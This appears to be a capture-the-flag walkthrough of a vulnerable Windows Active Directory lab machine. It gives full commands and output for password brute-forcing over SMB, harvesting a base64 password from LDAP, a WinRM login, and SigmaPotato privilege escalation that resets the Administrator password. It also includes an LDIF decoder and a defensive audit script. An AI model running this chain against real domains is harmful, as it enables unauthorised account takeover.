VulNyx - Misconfigured
Information
Misconfigured is a medium-difficulty vulnerable Windows virtual machine from the VulNyx platform. It was created by the user d4t4s3c and runs correctly on the VirtualBox hypervisor.

Enumeration
Nmap
TCP
root@kali:~ ❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.37
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-07 12:31 CEST
Nmap scan report for 192.168.1.37
Host is up (0.00074s latency).
Not shown: 65507 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5357/tcp open wsdapi
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
49674/tcp open unknown
49679/tcp open unknown
49684/tcp open unknown
49691/tcp open unknown
49704/tcp open unknown
root@kali:~ ❯ nmap -sVC -p53,80,88,135,139,389,445,464,593,636,3268,3269,5357,5985,9389,47001,49664,49665,49666,49667,49669,49670,49671,49674,49679,49684,49691,49704 192.168.1.37
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-07 12:33 CEST
Nmap scan report for 192.168.1.37
Host is up (0.00040s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-07 19:34:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: allsafe.nyx0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: allsafe.nyx0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49691/tcp open msrpc Microsoft Windows RPC
49704/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:67:78:25 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Host: MISCONFIGURED; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 9h00m01s
| smb2-time:
| date: 2025-10-07T19:34:57
|_ start_date: N/A
|_nbstat: NetBIOS name: MISCONFIGURED, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:67:78:25 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Shell (c.slater)
80/TCP (HTTP)
Site (/)

Directory Brute Force
root@kali:~ ❯ gobuster dir -w /opt/common.txt -u http://192.168.1.37/
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.37/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.env (Status: 200) [Size: 53]
Progress: 4746 / 4746 (100.00%)
===============================================================
Finished
===============================================================
Site (/.env)
The .env file exposed in the IIS web root leaks the database username a.moss. DB_PASS holds the literal string null, so there is no password to reuse, but the username turns out to be a valid domain account.
root@kali:~ ❯ curl -sX GET "http://192.168.1.37/.env"
DB_HOST="127.0.0.1"
DB_USER="a.moss"
DB_PASS="null"
445/TCP (SMB)
Basic Enumeration
I add the discovered domain allsafe.nyx to my /etc/hosts file for the later attacks. The trailing "0." that nmap printed after the domain on ports 389 and 3268 is an artifact of its LDAP service probe; netexec below confirms the domain is allsafe.nyx. Note also that nmap reports a clock skew of about 9 hours against the DC. NTLM-based tools such as netexec and smbclient do not care, but Kerberos rejects tickets outside a 5-minute window, so any Kerberos-based step would first need the attacking host's clock synced to the DC (for example with ntpdate or faketime).
root@kali:~ ❯ netexec smb 192.168.1.37
SMB 192.168.1.37 445 MISCONFIGURED [*] Windows 10 / Server 2019 Build 17763 x64 (name:MISCONFIGURED) (domain:allsafe.nyx) (signing:True) (SMBv1:False)
Shares
Null Session
root@kali:~ ❯ smbclient -NL //192.168.1.37
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.1.37 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
root@kali:~ ❯ smbmap --no-banner -H 192.168.1.37 -u '' -p ''
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[!] Access denied on 192.168.1.37, no fun for you...
[*] Closed 1 connections
root@kali:~ ❯ netexec smb 192.168.1.37 -u '' -p '' --shares
SMB 192.168.1.37 445 MISCONFIGURED [*] Windows 10 / Server 2019 Build 17763 x64 (name:MISCONFIGURED) (domain:allsafe.nyx) (signing:True) (SMBv1:False)
SMB 192.168.1.37 445 MISCONFIGURED [+] allsafe.nyx\:
SMB 192.168.1.37 445 MISCONFIGURED [-] Error enumerating shares: STATUS_ACCESS_DENIED
RPC
Null Session
root@kali:~ ❯ rpcclient -NU "" 192.168.1.37 -c "srvinfo"
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
Password Brute Force
With the username a.moss in hand, I run a wordlist against SMB with netexec and get a hit with Password1. The grep -v '[-]' filter hides the failed attempts so only the successful line remains. Against a real domain, check the lockout threshold first (netexec smb ... --pass-pol) before hammering a single account like this.
root@kali:~ ❯ netexec smb 192.168.1.37 -u 'a.moss' -p /opt/techyou.txt | grep -v '[-]'
SMB 192.168.1.37 445 MISCONFIGURED [*] Windows 10 / Server 2019 Build 17763 x64 (name:MISCONFIGURED) (domain:allsafe.nyx) (signing:True) (SMBv1:False)
SMB 192.168.1.37 445 MISCONFIGURED [+] allsafe.nyx\a.moss:Password1
389/TCP (LDAP)
Null Session
root@kali:~ ❯ ldapsearch -x -H ldap://192.168.1.37 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=allsafe,DC=nyx
namingcontexts: CN=Configuration,DC=allsafe,DC=nyx
namingcontexts: CN=Schema,CN=Configuration,DC=allsafe,DC=nyx
namingcontexts: DC=DomainDnsZones,DC=allsafe,DC=nyx
namingcontexts: DC=ForestDnsZones,DC=allsafe,DC=nyx
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
root@kali:~ ❯ ldapsearch -x -H ldap://192.168.1.37 -b "DC=allsafe,DC=nyx"
# extended LDIF
#
# LDAPv3
# base <DC=allsafe,DC=nyx> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
# numResponses: 1
Authenticated
Bound as a.moss, I can read the directory and find a second user, c.slater.
root@kali:~ ❯ ldapsearch -H ldap://192.168.1.37 -D 'a.moss@allsafe.nyx' -w 'Password1' -b "DC=allsafe,DC=nyx" | grep "userPrincipalName"
userPrincipalName: a.moss@allsafe.nyx
userPrincipalName: c.slater@allsafe.nyx
In the attributes of c.slater I find an encoded password in the userPassword attribute, and the memberOf attribute shows the account belongs to the Remote Management Users group, which is exactly what is needed to log in over WinRM (5985/tcp).
root@kali:~ ❯ ldapsearch -H ldap://192.168.1.37 -D 'a.moss@allsafe.nyx' -w 'Password1' -b "DC=allsafe,DC=nyx" | grep "c.slater" -C 35
# Christian Slater, Users, allsafe.nyx
dn: CN=Christian Slater,CN=Users,DC=allsafe,DC=nyx
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Christian Slater
sn: Slater
description: IT Department
userPassword:: UEB6elcwcmQyMDI1IQ==
givenName: Christian
distinguishedName: CN=Christian Slater,CN=Users,DC=allsafe,DC=nyx
instanceType: 4
whenCreated: 20251006111509.0Z
whenChanged: 20251007030156.0Z
displayName: Christian Slater
uSNCreated: 33827
memberOf: CN=Remote Management Users,CN=Builtin,DC=allsafe,DC=nyx
uSNChanged: 77857
name: Christian Slater
objectGUID:: IyOxWL7XB0m3+UkTKFGYkw==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 134042443991737590
lastLogoff: 0
lastLogon: 134042444030493615
pwdLastSet: 134042229099181623
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAw+oenlPZXEp9EBgLUAQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: c.slater
sAMAccountType: 805306368
userPrincipalName: c.slater@allsafe.nyx
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=allsafe,DC=nyx
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 134042231679202346
In LDIF a double colon (::) after the attribute name means the value is base64-encoded, not encrypted. I decode the userPassword string and obtain the plaintext password.
root@kali:~ ❯ base64 -d <<< 'UEB6elcwcmQyMDI1IQ=='
P@zzW0rd2025!
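The decode above was done by hand for a single attribute. The script below is an added example, not part of the original write-up: it parses ldapsearch LDIF output (including folded continuation lines and the :: base64 marker), converts the binary attributes to readable form (objectSid to an S-1-5-21 string, objectGUID to its mixed-endian GUID form, FILETIME values such as pwdLastSet to UTC timestamps, userAccountControl to flag names) and lists every account that carries a userPassword value. The embedded LDIF is a constructed excerpt of the c.slater entry shown above; the decoded pwdLastSet matching whenCreated (2025-10-06 11:15:09Z) is a useful sanity check of the FILETIME math.

```python
"""Decode the base64 and binary attributes in an ldapsearch LDIF dump.

Added example, not part of the original write-up. SAMPLE_LDIF is a constructed
excerpt of the c.slater entry, keeping only the attributes the demo needs.
"""
import base64
import re
import struct
import uuid
from datetime import datetime, timedelta, timezone

# Constructed sample: lines copied from the c.slater entry as ldapsearch prints them.
SAMPLE_LDIF = """\
# Christian Slater, Users, allsafe.nyx
dn: CN=Christian Slater,CN=Users,DC=allsafe,DC=nyx
description: IT Department
userPassword:: UEB6elcwcmQyMDI1IQ==
memberOf: CN=Remote Management Users,CN=Builtin,DC=allsafe,DC=nyx
objectGUID:: IyOxWL7XB0m3+UkTKFGYkw==
userAccountControl: 66048
pwdLastSet: 134042229099181623
accountExpires: 9223372036854775807
objectSid:: AQUAAAAAAAUVAAAAw+oenlPZXEp9EBgLUAQAAA==
sAMAccountName: c.slater
"""

FILETIME_ATTRS = {"pwdLastSet", "lastLogon", "lastLogonTimestamp",
                  "badPasswordTime", "accountExpires"}
# Only the userAccountControl bits that matter for triage.
UAC_FLAGS = {0x0002: "ACCOUNTDISABLE", 0x0020: "PASSWD_NOTREQD",
             0x0200: "NORMAL_ACCOUNT", 0x10000: "DONT_EXPIRE_PASSWORD",
             0x400000: "DONT_REQ_PREAUTH"}
ATTR_RE = re.compile(r"^([^:\s]+)(::?) ?(.*)$")


def parse_ldif(text):
    """Return a list of entries ({attribute: [values]}). Continuation lines
    (leading space) are unfolded; values marked with '::' are base64-decoded to bytes."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    entries, current = [], {}
    for line in lines + [""]:              # trailing "" flushes the last entry
        if not line:
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        m = ATTR_RE.match(line)
        if not m:
            continue
        name, marker, value = m.groups()
        value = value.strip()
        if marker == "::":
            value = base64.b64decode(value)
        current.setdefault(name, []).append(value)
    return entries


def sid_to_str(blob):
    """Binary SID: revision, sub-authority count, 48-bit big-endian identifier
    authority, then little-endian 32-bit sub-authorities."""
    revision, count = blob[0], blob[1]
    authority = int.from_bytes(blob[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, blob, 8)
    return "S-%d-%d-%s" % (revision, authority, "-".join(map(str, subs)))


def filetime_to_iso(value):
    """FILETIME is 100 ns ticks since 1601-01-01 UTC; 0 and INT64_MAX mean 'never'."""
    ticks = int(value)
    if ticks in (0, 0x7FFFFFFFFFFFFFFF):
        return "never"
    start = datetime(1601, 1, 1, tzinfo=timezone.utc)
    return (start + timedelta(microseconds=ticks // 10)).strftime("%Y-%m-%d %H:%M:%S UTC")


def uac_flags(value):
    """Names of the known userAccountControl bits set in value."""
    value = int(value)
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def decode_entry(entry):
    """Turn raw LDIF values into human-readable ones."""
    decoded = {}
    for attr, values in entry.items():
        for v in values:
            if attr == "objectSid":
                v = sid_to_str(v)
            elif attr == "objectGUID":
                v = str(uuid.UUID(bytes_le=v))      # AD stores GUIDs in mixed-endian order
            elif attr in FILETIME_ATTRS:
                v = filetime_to_iso(v)
            elif attr == "userAccountControl":
                v = "%s (%s)" % (v, ", ".join(uac_flags(v)))
            elif isinstance(v, bytes):
                v = v.decode("utf-8", "replace")    # e.g. userPassword: base64 is encoding, not a cipher
            decoded.setdefault(attr, []).append(v)
    return decoded


def cleartext_passwords(entries):
    """(sAMAccountName, password) for every entry that carries a userPassword value."""
    hits = []
    for entry in map(decode_entry, entries):
        for pw in entry.get("userPassword", []):
            hits.append((entry.get("sAMAccountName", ["?"])[0], pw))
    return hits


if __name__ == "__main__":
    for entry in parse_ldif(SAMPLE_LDIF):
        for attr, values in decode_entry(entry).items():
            for v in values:
                print("%-22s %s" % (attr, v))
```

To use it on a real dump, pipe the full ldapsearch output into parse_ldif instead of SAMPLE_LDIF; the description attribute is worth scanning for credentials as well, since administrators habitually leave passwords there.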
5985/TCP (WinRM)
I verify the recovered credentials over SMB and WinRM and get a shell on the system as c.slater.
root@kali:~ ❯ netexec smb 192.168.1.37 -u 'c.slater' -p 'P@zzW0rd2025!'
SMB 192.168.1.37 445 MISCONFIGURED [*] Windows 10 / Server 2019 Build 17763 x64 (name:MISCONFIGURED) (domain:allsafe.nyx) (signing:True) (SMBv1:False)
SMB 192.168.1.37 445 MISCONFIGURED [+] allsafe.nyx\c.slater:P@zzW0rd2025!
root@kali:~ ❯ netexec winrm 192.168.1.37 -u 'c.slater' -p 'P@zzW0rd2025!'
WINRM 192.168.1.37 5985 MISCONFIGURED [*] Windows 10 / Server 2019 Build 17763 (name:MISCONFIGURED) (domain:allsafe.nyx)
WINRM 192.168.1.37 5985 MISCONFIGURED [+] allsafe.nyx\c.slater:P@zzW0rd2025! (Pwn3d!)
root@kali:~ ❯ evil-winrm -i 192.168.1.37 -u 'c.slater' -p 'P@zzW0rd2025!'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\c.slater\Documents> whoami ; hostname
allsafe\c.slate
Privilege Escalation
Enumeration
Privileges
The user c.slater holds SeImpersonatePrivilege. This is the misconfiguration: by default "Impersonate a client after authentication" is granted only to Administrators and the service accounts (SERVICE, LOCAL SERVICE, NETWORK SERVICE, plus IIS_IUSRS when IIS is installed), and a regular domain user who can log in over WinRM should never have it, because it is enough to obtain SYSTEM with any of the Potato family of tools.
*Evil-WinRM* PS C:\> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
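From the defender's side, the question is who was granted this right and how. The script below is an added example, not part of the original write-up: it parses the [Privilege Rights] section of a "secedit /export /cfg secpol.inf /areas USER_RIGHTS" export (run elevated on the target) and flags every holder of SeImpersonatePrivilege that is not in the default set. The embedded INF excerpt is constructed, not taken from the machine; it assumes the right was granted directly to c.slater's SID (his objectSid from the LDAP dump above decodes to S-1-5-21-2652826307-1247598931-186126461-1104), which is one way to produce the whoami /priv output shown.

```python
"""Flag non-default holders of SeImpersonatePrivilege in a secedit export.

Added example, not part of the original write-up. Run as
    python audit_impersonate.py secpol.inf
against a file produced by  secedit /export /cfg secpol.inf /areas USER_RIGHTS ;
with no argument it uses the constructed SAMPLE_INF below.
"""
import re
import sys

# Default "Impersonate a client after authentication" holders on Windows Server.
# IIS_IUSRS is added when the Web Server role is installed (IIS is on port 80 here).
DEFAULT_IMPERSONATE = {
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-6": "NT AUTHORITY\\SERVICE",
    "S-1-5-19": "NT AUTHORITY\\LOCAL SERVICE",
    "S-1-5-20": "NT AUTHORITY\\NETWORK SERVICE",
    "S-1-5-32-568": "BUILTIN\\IIS_IUSRS",
}

# Constructed sample in secedit's INF format ('*' prefixes a SID; unresolved
# names appear bare). The last SID is the one assumed to be c.slater's.
SAMPLE_INF = """\
[Unicode]
Unicode=yes
[Privilege Rights]
SeMachineAccountPrivilege = *S-1-5-11
SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-6,*S-1-5-19,*S-1-5-20,*S-1-5-32-568,*S-1-5-21-2652826307-1247598931-186126461-1104
SeRemoteInteractiveLogonRight = *S-1-5-32-544,*S-1-5-32-555
[Version]
signature="$CHICAGO$"
Revision=1
"""


def parse_privilege_rights(text):
    """Return {privilege: [holder, ...]} from the [Privilege Rights] section."""
    rights, in_section = {}, False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_section = line.lower() == "[privilege rights]"
            continue
        if not in_section or "=" not in line:
            continue
        name, _, value = line.partition("=")
        holders = [h.strip().lstrip("*") for h in value.split(",") if h.strip()]
        rights[name.strip()] = holders
    return rights


def unexpected_holders(rights, privilege="SeImpersonatePrivilege", expected=DEFAULT_IMPERSONATE):
    """Holders of privilege that are outside the expected default set."""
    return [h for h in rights.get(privilege, []) if h not in expected]


def is_domain_account_sid(sid):
    """True for a domain SID (S-1-5-21-...) whose RID is in the range used for
    created users and groups (>= 1000), as opposed to well-known or builtin SIDs."""
    m = re.match(r"^S-1-5-21(?:-\d+){3}-(\d+)$", sid)
    return bool(m) and int(m.group(1)) >= 1000


if __name__ == "__main__":
    # secedit writes the export as UTF-16 with a BOM ([Unicode] Unicode=yes).
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-16") as fh:
            text = fh.read()
    else:
        text = SAMPLE_INF
    for holder in unexpected_holders(parse_privilege_rights(text)):
        kind = "domain account or group" if is_domain_account_sid(holder) else "well-known/builtin"
        print("REVIEW: SeImpersonatePrivilege granted to %s (%s)" % (holder, kind))
```

A flagged S-1-5-21 SID may be a group rather than a user, so resolve it (for example with Get-ADObject -Filter 'objectSid -eq "<sid>"' on the DC) and check its membership; if the setting comes from a GPO rather than the local policy, gpresult /h will show which one.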
OS & Kernel
I confirm that the target is Windows Server 2019 (x64), which matters for picking a Potato variant and the right binary architecture.
*Evil-WinRM* PS C:\> Get-ComputerInfo
WindowsBuildLabEx : 17763.1.amd64fre.rs5_release.180914-1434
WindowsCurrentVersion : 6.3
WindowsEditionId : ServerStandardEval
WindowsInstallationType : Server
WindowsInstallDateFromRegistry : 10/6/2025 8:56:34 AM
WindowsProductId : 00431-10000-00000-AA987
WindowsProductName : Windows Server 2019 Standard Evaluation
WindowsRegisteredOrganization :
WindowsRegisteredOwner : Windows User
WindowsSystemRoot : C:\Windows
WindowsVersion : 1809
*Evil-WinRM* PS C:\> [Environment]::Is64BitOperatingSystem
True
Abuse
SeImpersonatePrivilege
I use SigmaPotato to escalate privileges and transfer the SigmaPotato.exe binary to the victim with Evil-WinRM's upload command.
❯ mv /home/kali/Downloads/SigmaPotato.exe .
*Evil-WinRM* PS C:\Users\c.slater\Documents> upload SigmaPotato.exe
Info: Uploading /root/SigmaPotato.exe to C:\Users\c.slater\Documents\SigmaPotato.exe
Data: 84648 bytes of 84648 bytes copied
Info: Upload successful!
I run SigmaPotato.exe with the command to change the administrator password. In the output, the tool first impersonates NT AUTHORITY\NETWORK SERVICE through its named pipe, then locates and duplicates a SYSTEM token and launches the command with CreateProcessWithTokenW. Resetting the built-in Administrator password is the fastest proof on a lab box, but on a real engagement it is destructive and very visible; launching a reverse shell as SYSTEM or adding a user to a group is the usual choice.
*Evil-WinRM* PS C:\Users\c.slater\Documents> .\SigmaPotato.exe "net user administrator Password1"
[+] Starting Pipe Server...
[+] Created Pipe Name: \\.\pipe\SigmaPotato\pipe\epmapper
[+] Pipe Connected!
[+] Impersonated Client: NT AUTHORITY\NETWORK SERVICE
[+] Searching for System Token...
[+] PID: 744 | Token: 0x804 | User: NT AUTHORITY\SYSTEM
[+] Found System Token: True
[+] Duplicating Token...
[+] New Token Handle: 940
[+] Current Command Length: 32 characters
[+] Creating Process via 'CreateProcessWithTokenW'
[+] Process Started with PID: 3468
[+] Process Output:
The command completed successfully.
I verify the new credentials and log in as administrator.
root@kali:~ ❯ netexec smb 192.168.1.37 -u 'administrator' -p 'Password1'
SMB 192.168.1.37 445 MISCONFIGURED [*] Windows 10 / Server 2019 Build 17763 x64 (name:MISCONFIGURED) (domain:allsafe.nyx) (signing:True) (SMBv1:False)
SMB 192.168.1.37 445 MISCONFIGURED [+] allsafe.nyx\administrator:Password1 (Pwn3d!)
root@kali:~ ❯ netexec winrm 192.168.1.37 -u 'administrator' -p 'Password1' 2>/dev/null
WINRM 192.168.1.37 5985 MISCONFIGURED [*] Windows 10 / Server 2019 Build 17763 (name:MISCONFIGURED) (domain:allsafe.nyx)
WINRM 192.168.1.37 5985 MISCONFIGURED [+] allsafe.nyx\administrator:Password1 (Pwn3d!)
root@kali:~ ❯ evil-winrm -i 192.168.1.37 -u 'administrator' -p 'Password1' 2>/dev/null
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami ; hostname
allsafe\administrator
MISCONFIGURED
Flags
Now as administrator I can read the user.txt and root.txt flags.
*Evil-WinRM* PS C:\> type c:\users\c.slater\desktop\user.txt
e64*****************************
*Evil-WinRM* PS C:\> type c:\users\administrator\desktop\root.txt
035*****************************
That concludes the walkthrough of the Misconfigured machine.
Happy Hacking!